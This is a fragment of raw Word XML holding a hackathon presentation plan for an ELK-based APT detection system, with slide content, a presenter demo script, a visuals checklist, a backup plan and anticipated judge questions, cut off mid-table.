              <w:t>3️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Proposed Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45EC67B8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ELK-Based APT Detection Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1953DC08" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>- Diagram (use the one you generated earlier).</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>- Components: Beats → Logstash → Elasticsearch → Kibana → Alerts.</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t xml:space="preserve">- Explain how you develop </w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>threat rules</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> that detect APT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>behavior</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> in real time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="51820E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A15EF" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Implementation Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD855C8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Our Tech Stack &amp; Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5F991F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">- Tools: ELK Stack (Elastic, Logstash, Kibana), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>Filebeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>, Suricata, Python.</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>- Key features:</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>• Real-time log collection</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>• Parsing &amp; normalization</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>• Threat rule creation (MITRE ATT&amp;CK mapped)</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>• Dashboard visualization.</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>- Add screenshots of Kibana dashboards, alerts, and Suricata logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="037C6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CA514" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Demo Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3405ADB5" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Live Detection Showcase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E5D07E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Steps:</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>1️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Run an Atomic Red Team test (e.g., PowerShell command).</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>2️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Logs collected via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>Winlogbeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> → Logstash → Elasticsearch.</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>3️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Kibana alert triggers showing MITRE technique.</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>4️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Dashboard updates with geo-location &amp; severity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="40E83A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58947" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Impact &amp; Future Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="762052E3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Benefits &amp; Future Expansion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5118D675" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Early APT detection (real-time)</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Easy integration in existing SOC</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Reusable detection rules for other attacks</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>➡️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Future: Integrate AI/Transformers for adaptive learning and zero-day attack prediction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2815F4A3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="7392789B">
          <v:rect id="_x0000_i1130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56DBEA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🎬</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8.2 — Live Demo Script (for SIH Presentation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FA3E2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🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Presenter 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t xml:space="preserve">“We’ve built an ELK-based APT Detection System that can detect real-world cyberattacks by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> logs in real-time.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7EE2F3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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Presenter 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t xml:space="preserve">“APT or Advanced Persistent Threats are stealthy, long-term cyber intrusions that are hard to detect with traditional tools. Our solution leverages ELK Stack to automatically collect, parse, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> logs — detecting unusual patterns like PowerShell misuse, credential dumping, or exfiltration.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD579EB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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Presenter 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t xml:space="preserve">“We integrated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">, and Suricata for real-time data collection. Logstash normalizes and enriches logs with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> and threat intel. Detection rules are based on MITRE ATT&amp;CK framework and continuously updated.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2E6BD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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Presenter 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t>“Now, let’s show a live demo. We’ll trigger a simulated PowerShell attack using Atomic Red Team.”</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(run the test — show Kibana alert triggering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4ACD9C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💡</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Presenter 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t>“As you see, within seconds, the event appears in Kibana with a mapped MITRE ID (T1059.001) and alert severity marked as High.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE9131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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Presenter 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t>“Our dashboard provides real-time analytics on attack types, sources, and severities, helping security analysts respond immediately.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4F57E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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Presenter 1 (closing):</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t>“This system transforms ELK into a next-generation APT detection platform that’s modular, scalable, and suitable for government or enterprise SOC environments.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DAC3CE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="5529CEC3">
          <v:rect id="_x0000_i1131" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496984A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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8.3 — Must-Have Visuals for SIH Slides</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D42A5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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — (already generated by you earlier).</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log Flow Screenshot</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — Beats → Logstash → Elasticsearch logs in Kibana.</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detection Alert Screenshot</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — with MITRE Technique ID visible.</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dashboard Snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — Geo map + bar graph of attack frequency.</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo Recording (Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — 15–30s screen capture of alert triggering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D2A636" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="3FEE03CE">
          <v:rect id="_x0000_i1132" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F192B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lastRenderedPageBreak/>
        <w:t>🎥</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8.4 — Backup Plan (If Internet or VM Fails During Demo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB55F43" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>If live demo doesn’t work due to network restrictions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14629B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Keep </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recorded video (MP4)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> of alert generation (2–3 short clips).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3517C946" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Prepare </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>screenshots</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> of every stage (log ingestion → alert → dashboard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C914ABC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Practice </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>offline explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> with visuals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CECF301" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Judges usually appreciate that — they know cyber setups are tricky to demo live.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493325A2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="2914BE12">
          <v:rect id="_x0000_i1133" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A37A180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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8.5 — Additional Notes for Judging Rounds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7318"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="4BDE76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B89AF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Judge Might Ask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E1DE4C7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How You Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="40AF73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1FA10" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>“What’s new here? ELK already exists.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0562F721" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">“We built </w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>custom threat detection rules for APTs</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> that map directly to MITRE ATT&amp;CK and tested them using simulated attacks — most ELK setups are generic log systems, ours detects complex multi-stage threats.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="684618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46B4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>“Why not use AI?”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28052416" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
